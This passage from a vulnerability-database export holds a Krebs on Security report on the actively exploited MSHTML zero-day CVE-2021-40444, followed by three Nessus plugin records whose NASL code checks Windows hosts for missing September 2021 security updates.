[CVE-2021-40444](<https://us-cert.cisa.gov/ncas/current-activity/2021/09/07/microsoft-releases-mitigations-and-workarounds-cve-2021-40444>) affects the &quot;MSHTML&quot; component of **Internet Explorer** (IE) on **Windows 10** and many **Windows Server** versions. IE been slowly abandoned for more recent Windows browsers like **Edge**, but the same vulnerable component also is used by **Microsoft Office** applications for rendering web-based content.\n\n&quot;An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine,&quot; Microsoft wrote. &quot;The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.&quot;\n\nMicrosoft has not yet released a patch for CVE-2021-40444, but says users can mitigate the threat from this flaw by disabling the installation of all ActiveX controls in IE. Microsoft says the vulnerability is currently being used in targeted attacks, although its advisory credits three different entities with reporting the flaw.\n\nOn of the researchers credited -- **EXPMON** -- [said on Twitter](<https://twitter.com/EXPMON_/status/1435310341689331721>) that it had reproduced the attack on the latest Office 2019 / Office 365 on Windows 10.\n\n&quot;The exploit uses logical flaws so the exploitation is perfectly reliable (&amp; dangerous),&quot; EXPMON tweeted.\n\nWindows users could see an official fix for the bug as soon as September 14, when Microsoft is slated to release its monthly &quot;Patch Tuesday&quot; bundle of security updates.\n\nThis year has been a tough one for Windows users and so-called &quot;zero day&quot; threats, which refers to vulnerabilities that are not patched by current versions of the software in question, and are being actively exploited to break into vulnerable computers.\n\nVirtually every month in 2021 so far, Microsoft has been forced to respond to zero-day threats targeting huge swaths of its user base. In fact, by my count May was the only month so far this year that Microsoft didn&#x27;t release a patch to fix at least one zero-day attack in Windows or supported software.\n\nMany of those zero-days involve older Microsoft technologies or those that have been retired, like IE11; Microsoft [officially retired support for Microsoft Office 365 apps and services on IE11](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/microsoft-365-apps-say-farewell-to-internet-explorer-11-and/ba-p/1591666>) last month. In July, Microsoft [rushed out a fix for the Print Nightmare vulnerability](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>) that was present in every supported version of Windows, only to see the patch cause problems for a number of Windows users.\n\nOn June&#x27;s Patch Tuesday, Microsoft [addressed six zero-day security holes](<https://krebsonsecurity.com/2021/06/microsoft-patches-six-zero-day-security-holes/>). And of course in March, hundreds of thousands of organizations running **Microsoft Exchange** email servers found those systems [compromised with backdoors thanks to four zero-day flaws in Exchange](<https://krebsonsecurity.com/2021/03/at-least-30000-u-s-organizations-newly-hacked-via-holes-in-microsofts-email-software/>).", "cvss3": {}, "published": "2021-09-08T15:03:45", "type": "krebs", "title": "Microsoft: Attackers Exploiting Windows Zero-Day Flaw", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-09-08T15:03:45", "id": "KREBS:409088FC2DFC219B74043104C2B672CC", "href": "https://krebsonsecurity.com/2021/09/microsoft-attackers-exploiting-windows-zero-day-flaw/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-18T15:33:46", "description": "The remote Windows host is missing security update 5005618 or cumulative update 5005606. It is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36962, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36968, CVE-2021-38625, CVE-2021-38626, CVE-2021-38628, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005618: Windows Server 2008 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36959", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-38625", "CVE-2021-38626", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-01-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005606.NASL", "href": "https://www.tenable.com/plugins/nessus/153386", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153386);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36959\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36968\",\n \"CVE-2021-38625\",\n \"CVE-2021-38626\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005606\");\n script_xref(name:\"MSKB\", value:\"5005618\");\n script_xref(name:\"MSFT\", value:\"MS21-5005606\");\n script_xref(name:\"MSFT\", value:\"MS21-5005618\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005618: Windows Server 2008 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005618\nor cumulative update 5005606. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36962, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36968, CVE-2021-38625, CVE-2021-38626,\n CVE-2021-38628, CVE-2021-38633, CVE-2021-38638,\n CVE-2021-38639, CVE-2021-38667, CVE-2021-38671,\n CVE-2021-40447)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005606-monthly-rollup-e6cb2ae9-f688-4f8b-b742-43b03b791d6d\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?16fe7ded\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005618-security-only-update-08a80048-babc-41ce-8b4b-cfd10c7c0dda\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?32ea9fe0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005618 or Cumulative Update KB5005606.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005606', '5005618');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005606, 5005618])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:12", "description": "The remote Windows host is missing security update 5005627 or cumulative update 5005613. It is, therefore, affected by multiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-36972, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36974, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36974", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40444", "CVE-2021-40447"], "modified": "2023-01-30T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005613.NASL", "href": "https://www.tenable.com/plugins/nessus/153375", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153375);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/30\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36969\",\n \"CVE-2021-36972\",\n \"CVE-2021-36974\",\n \"CVE-2021-38624\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40444\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"MSKB\", value:\"5005613\");\n script_xref(name:\"MSKB\", value:\"5005627\");\n script_xref(name:\"MSFT\", value:\"MS21-5005613\");\n script_xref(name:\"MSFT\", value:\"MS21-5005627\");\n\n script_name(english:\"KB5005627: Windows 8.1 and Windows Server 2012 R2 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005627\nor cumulative update 5005613. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-36972, CVE-2021-38629,\n CVE-2021-38635, CVE-2021-38636)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, \n CVE-2021-36958, CVE-2021-40444)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36974, CVE-2021-38628, CVE-2021-38630,\n CVE-2021-38633, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-38624)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005627-security-only-update-3404d598-7d6e-4007-93e8-49438460791f\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c74eba5d\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005613-monthly-rollup-47b217aa-8d33-4b29-b444-77fcbe57410b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f099b11d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005627 or Cumulative Update KB5005613.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Office Word Malicious MSHTML RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005627', '5005613');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit('SMB/ProductName', exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005627, 5005613])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:33:59", "description": "The remote Windows host is missing security update 5005615 or cumulative update 5005633. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964, CVE-2021-36968, CVE-2021-38628, CVE-2021-38630, CVE-2021-38633, CVE-2021-38638, CVE-2021-38639, CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2021-36960, CVE-2021-36962, CVE-2021-36969, CVE-2021-38629, CVE-2021-38635, CVE-2021-38636)\n\n - An memory corruption vulnerability exists. An attacker can exploit this to corrupt the memory and cause unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2021-36959)", "cvss3": {}, "published": "2021-09-14T00:00:00", "type": "nessus", "title": "KB5005615: Windows 7 and Windows Server 2008 R2 September 2021 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36958", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36969", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2022-05-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_SEP_5005633.NASL", "href": "https://www.tenable.com/plugins/nessus/153379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153379);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/09\");\n\n script_cve_id(\n \"CVE-2021-26435\",\n \"CVE-2021-36955\",\n \"CVE-2021-36958\",\n \"CVE-2021-36959\",\n \"CVE-2021-36960\",\n \"CVE-2021-36961\",\n \"CVE-2021-36962\",\n \"CVE-2021-36963\",\n \"CVE-2021-36964\",\n \"CVE-2021-36965\",\n \"CVE-2021-36968\",\n \"CVE-2021-36969\",\n \"CVE-2021-38628\",\n \"CVE-2021-38629\",\n \"CVE-2021-38630\",\n \"CVE-2021-38633\",\n \"CVE-2021-38635\",\n \"CVE-2021-38636\",\n \"CVE-2021-38638\",\n \"CVE-2021-38639\",\n \"CVE-2021-38667\",\n \"CVE-2021-38671\",\n \"CVE-2021-40447\"\n );\n script_xref(name:\"MSKB\", value:\"5005615\");\n script_xref(name:\"MSKB\", value:\"5005633\");\n script_xref(name:\"MSFT\", value:\"MS21-5005615\");\n script_xref(name:\"MSFT\", value:\"MS21-5005633\");\n script_xref(name:\"IAVA\", value:\"2021-A-0431-S\");\n script_xref(name:\"IAVA\", value:\"2021-A-0429-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"KB5005615: Windows 7 and Windows Server 2008 R2 September 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5005615\nor cumulative update 5005633. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-36955, CVE-2021-36963, CVE-2021-36964,\n CVE-2021-36968, CVE-2021-38628, CVE-2021-38630,\n CVE-2021-38633, CVE-2021-38638, CVE-2021-38639,\n CVE-2021-38667, CVE-2021-38671, CVE-2021-40447)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-36960, CVE-2021-36962,\n CVE-2021-36969, CVE-2021-38629, CVE-2021-38635,\n CVE-2021-38636)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26435)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-36965, CVE-2021-36958)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-36961)\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2021-36959)\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005615-security-only-update-78aa3b33-a4d9-49ad-bb28-1394943a3d7b\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?deeac612\");\n # https://support.microsoft.com/en-us/topic/september-14-2021-kb5005633-monthly-rollup-cc6f560a-86da-4540-8bb1-df118fa45eb8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1c2d7a2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB5005615 or Cumulative Update KB5005633.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-36958\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2021-36965\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS21-09\";\nkbs = make_list('5005615', '5005633');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:'09_2021',\n bulletin:bulletin,\n rollup_kb_list:[5005615, 5005633])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": 